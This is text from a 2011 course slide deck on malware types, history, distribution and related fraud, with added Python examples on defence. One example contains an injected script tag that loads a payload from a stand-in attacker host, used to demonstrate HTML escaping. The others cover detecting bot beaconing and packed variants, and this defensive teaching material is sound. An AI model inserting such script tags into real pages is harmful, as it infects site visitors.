Malware - T&T Software WWW Server

Internet Vulnerabilities &
Criminal Activities
Malware
3.2
9/26/2011
Malware
Malicious software designed to
gain access to information and/or
resources without the knowledge
or consent of the end user
Malware History
 1981
 1983
 1986
 1988
 1990
 1991
 1994
 1995
 1998
- First Apple II virus in the wild
- Fred Cohen coins term “virus”
- First PC virus
- Morris Internet worm
- First Polymorphic virus
- Virus Construction Set
- Good Times virus hoax
- First Macro Virus
- Back Oriface tool released
Malware History cont.
 1999 - Melissa virus / worm
 1999 - Tribal Flood Network - DDoS tool
 2001 - Code Red worm
 2001 - Nimda worm
 2003 - Slammer worm
 2004 - So Big & Sasser worms
 2007 - Storm worm / Zeus botnet tool
 2008 - Conficker worm
 2010 – Stuxnet – weaponized malware
Malware Trends
 Increasing complexity & sophistication
 Acceleration of the rate of release of
innovative tools & techniques
 Movement from viruses to worms to
kernel-level exploitations
Malware can be:
 “Proof of concept”
Created to prove it can be done
Not found outside of laboratory
environment
If code available, can be used by others
 “In the Wild.”
Found on computers in everyday use
Traditional Categories of Malware
 Virus
 Worm
 Malicious Mobile Code
 Backdoor
 Trojan Horse
 Rootkit
 Combination Malware – Malware “Cocktail”
Virus
 Infects a host file
 Self replicates
 Requires human interaction to
replicate
 Examples:
Michelangelo
Melissa
Worm
 Spreads across a network
 Does not require human interaction to
spread
 Self-replicating
 Examples:
Morris Worm
Code Red
Slammer
Malicious Mobile Code
 Lightweight program downloaded from
a remote source and executed locally
 Minimal human interaction
 Written in JavaScript, VBScript,
ActiveX, or Java
 Example:
Cross-site scripting
Backdoor
 Bypasses normal security controls
 Gives attacker access to user’s system
 Example:
Netcat
Back Orifice
SubSeven (Sub7)
Trojan Horse
 Program that disguises its hidden
malicious purpose
 Appears to be harmless game or
screensaver
 Used for spyware & backdoors
 Not self-replicating
Rootkit
 Replaces or modifies programs that are
part of the operating system
 Two Levels
User-level
Kernel-level
 Examples
Universal Rootkit
Kernel Intrusion System
Combination Malware
 Uses a combination of various
techniques to increase effectiveness
 Examples:
Lion
Bugbear.B
Stuxnet
Malware Distribution
 Attachments
 E-mail and Instant Messaging
 Piggybacking
 Malware added to legitimate program
 Adware, spyware
 EULA - End User License Agreement
 Internet Worms
 Exploit security vulnerability
 Used to install backdoors
 Web Browser Exploit
 Malware added to legitimate web site
 Cross-site scripting & SQL Injection
 Visitors to web site may be infected
 Drive by malware
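A worked example of the “malware added to a legitimate web site” step above: the site’s comment page interpolates untrusted text straight into its HTML, so an injected `<script>` tag that fetches a remote payload is served to every visitor, while escaping the text before rendering makes the browser display it as data instead of executing it. This is an added example, not code from the slides; the hostname `attacker.example` and the page structure are placeholders chosen for illustration.

```python
import html

# Constructed inputs (not real traffic): a benign comment and one carrying an
# injected script tag that would load a remote payload. The hostname
# attacker.example is a placeholder.
BENIGN_COMMENT = "Great article, thanks!"
INJECTED_COMMENT = '<script src="http://attacker.example/payload.js"></script>'


def render_vulnerable(comment: str) -> str:
    """Interpolate untrusted text straight into the page (the bug)."""
    return f'<div class="comment">{comment}</div>'


def render_hardened(comment: str) -> str:
    """Escape untrusted text so <, >, & and quotes are shown, not parsed."""
    return f'<div class="comment">{html.escape(comment, quote=True)}</div>'


def contains_script_tag(rendered: str) -> bool:
    """Crude check: would a browser see a script element in this HTML?"""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    for name, page in [("vulnerable", render_vulnerable(INJECTED_COMMENT)),
                       ("hardened", render_hardened(INJECTED_COMMENT))]:
        print(f"{name}: script tag present = {contains_script_tag(page)}")
        print("   ", page)
```

The escaping shown is for HTML body text only; text placed inside attributes, URLs or inline JavaScript needs the encoding appropriate to that context, and the same injected tag would reach visitors just as well through a SQL injection that writes it into the site’s database.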
Malware Distribution cont.
 Hacking
 Too labor intensive for large crime operations
 May be used to compromise DNS server
 Affiliate Marketing
 Web site owner paid 8¢ to 50¢ per machine to
install malware on a visitor’s computer
 Mobile Devices
 Transfer via bluetooth
Malware Activity
 Adware
 Spyware
 Hijacker
 Toolbars
 Dialers
 Rogue Security Software
 Bots
Adware
 Displays ads on infected machine
 Ads format can be:
Pop-ups
Pop-under
Embedded in programs
On top web site ads
 More annoying than dangerous
Spyware
 Send information about infected computer to
someone, somewhere
 Web sites surfed
 Terms searched for
 Information from web forms
 Files downloaded
 Search hard drive for files installed
 E-mail address book
 Browser history
 Logon names, passwords, credit card numbers
 Any other personal information
Hijacker
 Takes control of web browser
Home page
Search engines
Search bar
Redirect sites
Prevent some sites from loading
 Internet Explorer especially vulnerable
Toolbars
 Plug-ins to IE
Google
Yahoo
 Attempt to emulate legitimate toolbars
 Installed via underhanded means
Adware or Spyware
 Acts as a keystroke logger
Dialers
 Alters modem connections and ISDN cards
 Once installed, will dial 1-900 numbers
or other premium rate numbers
 Run up end-users phone bill & provide
revenue for criminal enterprise
 Targets MS Windows
Rogue Security Software
 Usually delivered via a trojan horse
 Uses social engineering techniques to get
user to install
 Fake warnings that computer is infected
 Fake video of machine crashing
 Disables anti-virus and anti-spyware
programs
 Alters computer system so the rogue
software cannot be removed
Bots
 Allows attacker remote access to a computer
 When end-user is online, computer contacts
Command & Control (C&C) site
 Bot will then perform whatever commands are
received from the C&C
 Some things botnets are used for
 Distributed Denial of Service (DDoS) attacks
 Spam
 Hosting contraband such as child porn
 Other illegal fraud schemes
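The C&C check-in behaviour described above leaves a measurable trace: an infected host contacts the same server at near-constant intervals, while a user’s own browsing is irregular. The following is an added detection example, not from the slides, run over a constructed proxy log (format `timestamp client destination`; hostnames such as `c2.example.org` are placeholders). It groups connections per client and destination and flags pairs whose gaps between consecutive connections have a low coefficient of variation.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed proxy log (not real traffic): "ISO-timestamp client destination".
# 10.0.0.5 browses irregularly but also checks in with c2.example.org about
# every five minutes, which is the bot check-in pattern we want to surface.
SAMPLE_LOG = """\
2011-09-26T09:00:00 10.0.0.5 cdn.example.net
2011-09-26T09:00:00 10.0.0.5 c2.example.org
2011-09-26T09:01:17 10.0.0.5 mail.example.net
2011-09-26T09:05:01 10.0.0.5 c2.example.org
2011-09-26T09:07:44 10.0.0.5 cdn.example.net
2011-09-26T09:10:00 10.0.0.5 c2.example.org
2011-09-26T09:12:09 10.0.0.5 news.example.net
2011-09-26T09:14:59 10.0.0.5 c2.example.org
2011-09-26T09:20:02 10.0.0.5 c2.example.org
2011-09-26T09:21:30 10.0.0.5 cdn.example.net
2011-09-26T09:24:58 10.0.0.5 c2.example.org
2011-09-26T09:30:00 10.0.0.5 c2.example.org
2011-09-26T09:33:12 10.0.0.5 cdn.example.net
"""


def parse_log(text: str) -> dict:
    """Group connection timestamps by (client, destination)."""
    events = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        stamp, client, dest = line.split()
        events[(client, dest)].append(datetime.fromisoformat(stamp))
    return events


def find_beacons(text: str, min_hits: int = 4, max_cv: float = 0.1) -> dict:
    """Return {(client, dest): mean_gap_seconds} for near-periodic contacts.

    A low coefficient of variation (std dev / mean) of the gaps between
    consecutive connections means the timing is machine-regular rather
    than driven by a person clicking around.
    """
    beacons = {}
    for key, times in parse_log(text).items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue
        if pstdev(gaps) / avg <= max_cv:
            beacons[key] = round(avg, 1)
    return beacons


if __name__ == "__main__":
    for (client, dest), gap in find_beacons(SAMPLE_LOG).items():
        print(f"{client} -> {dest}: every {gap:.0f}s")
```

Legitimate software (update checkers, mail clients, CDN polling) beacons too, so hits from this check are leads to triage against the destination’s reputation, not verdicts; bots that add random jitter to their sleep interval push the coefficient of variation up and need a looser threshold or a different feature such as payload size.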
Weaponized Malware
 Attacks SCADA system
 Supervisory Control And Data Acquisition
 Causes physical damage
 SCADA systems control
 Dams
 Electrical grid
 Nuclear power plants
 Cyber War - The Aurora Project
 http://www.youtube.com/watch?v=rTkXgqK1l9A
More Malware Terminology
 Downloader
 Single line of code
 Payload from malware
 Instructs infected computer to download malware
from attacker’s server
 Drop
 Clandestine computer or service (E-mail)
 Collects information sent to it from infected
machines
 Blind Drop - well hidden, designed to run
unattended
More Malware Terminology
cont.
 Exploit
 Code used to take advantage of a vulnerability in
software code or configuration
 Form-grabber
 A program that steals information submitted by a
user to a web site
 Packer
 Tool used to scramble and compress an .exe file
 Hides malicious nature of code
 Makes analysis of program more difficult
More Malware Terminology
cont.
 Redirect
 HTTP feature
 Used to forward someone from one web page to
another
 Done invisibly with malware
 Variant
 Malware produced from the same code base
 Different enough to require new signature for
detection by anti-virus software
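An added example (not from the slides) that ties the Packer and Variant entries together. A packed sample is flagged by the high byte-entropy that compression or encryption leaves behind; here `zlib` stands in for a real packer and the “program” bytes are constructed. A variant in which only the C&C hostname changed defeats an exact-hash signature but still matches a byte-pattern signature that leaves that field as a wildcard. Hostnames are placeholders.

```python
import hashlib
import math
import re
import zlib


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 (all one value) up to 8.0 (uniform)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def looks_packed(data: bytes, threshold: float = 7.0) -> bool:
    """Packed or encrypted sections are close to random; plain code and text are not."""
    return shannon_entropy(data) >= threshold


# Constructed stand-ins: a low-entropy "program" made of ASCII text, and the
# same bytes after zlib compression, playing the role of a packed executable.
PLAIN_PROGRAM = b"".join(b"%d," % (i * i) for i in range(5000))
PACKED_PROGRAM = zlib.compress(PLAIN_PROGRAM, 9)

# Constructed samples from one code base: B is a variant of A in which only the
# C&C hostname was changed. The generic x86 prologue/epilogue bytes are filler
# so the pattern has fixed code on both sides of the wildcard.
PROLOGUE = b"\x55\x8b\xec"   # push ebp; mov ebp, esp
EPILOGUE = b"\x5d\xc3"       # pop ebp; ret
SAMPLE_A = PROLOGUE + b"connect to c2.example.org:8080" + EPILOGUE
SAMPLE_B = PROLOGUE + b"connect to c2-v2.example.org:8080" + EPILOGUE


def hash_signature(data: bytes) -> str:
    """Exact-match signature: SHA-256 of the whole file."""
    return hashlib.sha256(data).hexdigest()


def matches_hash(data: bytes, signature: str) -> bool:
    return hash_signature(data) == signature


# Byte-pattern signature: the fixed code with a wildcard for hostname:port.
PATTERN = re.compile(
    re.escape(PROLOGUE) + rb"connect to [\w.-]+:\d+" + re.escape(EPILOGUE)
)


def matches_pattern(data: bytes) -> bool:
    return PATTERN.search(data) is not None


if __name__ == "__main__":
    print(f"plain entropy  {shannon_entropy(PLAIN_PROGRAM):.2f}  packed: {looks_packed(PLAIN_PROGRAM)}")
    print(f"packed entropy {shannon_entropy(PACKED_PROGRAM):.2f}  packed: {looks_packed(PACKED_PROGRAM)}")
    sig_a = hash_signature(SAMPLE_A)
    print("variant caught by hash:   ", matches_hash(SAMPLE_B, sig_a))
    print("variant caught by pattern:", matches_pattern(SAMPLE_B))
```

Entropy alone cannot distinguish a packed sample from a legitimately compressed installer or an encrypted archive, so it is a triage signal that sends the file to unpacking or sandboxing rather than a detection on its own; the pattern signature shows why anti-virus vendors moved from whole-file hashes to byte and behaviour patterns as variants multiplied.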
Malware Sources
 Malware
 Can be programmed from scratch
 Less likely to be detected by anti-malware programs
 Can be purchased
 Malware tools
 Haxdoor, Torpig, Metafisher, Web Attacker
 Tools offered with other services
 Access to botnet, drop sites
 Tools derived from small stable base of existing
code
Frauds Involving Malware
 Advertising schemes
 Pay-per-view
 Pay-per-click (“Click Fraud”)
 Pay-per-install
 Banking fraud
 Identity theft
 Spam
 Denial-of-service attacks
 DoS extortion
Advertising Schemes
 Pay-per-view
Sell advertising space on controlled web
sites
Command botnet to “view” as many ads
as possible
May have ads download in the background
Fraudulent commissions generated
Advertising Schemes cont.
 Pay-per-click (“Click Fraud”)
 Similar to Pay-per-view fraud
 Bots simulate clicks on ads
 Between 5% and 35% of all ad commissions may
be fraudulent
 Pay-per-install
 Commission paid every time the advertiser’s
software is installed
 When installed, notification sent to advertiser
 Infected machines will be instructed to install
advertisers software
Banking Fraud
 Banks are a prime target of malware
 Malware can allow attacker to empty
victim’s bank account
 Example (September 2009)
 Rewrite online bank statements on the fly
 Covers up theft of funds
 Trojan horse
 Alters HTML code before browser displays
 Makes use of “Money Mules”
Identity Theft
 Phishing & key logging
 Recent increase in malware associated
with identity theft
 Information sent to drop site
Spam
 Bots used to send spam
 Also show dramatic rise
 Bots are available for rent for spam
purposes
 Spam sent can also contain malware
Denial of Service Attacks
 Botnet commanded to make requests
of a web site
 Web site may crash due to heavy
traffic
 Legitimate traffic blocked
 Threat of DoS attack can be used for
extortion
 Bots for rent for DoS attacks
Problems for Law Enforcement
 Anonymity
 Jurisdiction
 Attackers know how difficult international law
enforcement is
 Exploit the situation
 Target victims in one country from another country
 Have C&C site and drop site located in a third country
 Use multiple proxies to access C&C site and drop site
 Money gain quickly funneled through online bank
accounts and international money transfers
Other Issues
 Monetary Threshold
 Must reach a limit before prosecutor will take
case
 May be hard to prove exact amount of money
involved
 Cyber crimes may be considered a non-priority
 Virtual world emboldens individuals
 Less fear of getting caught
 Realization of difficulties in investigating crimes
 Easy money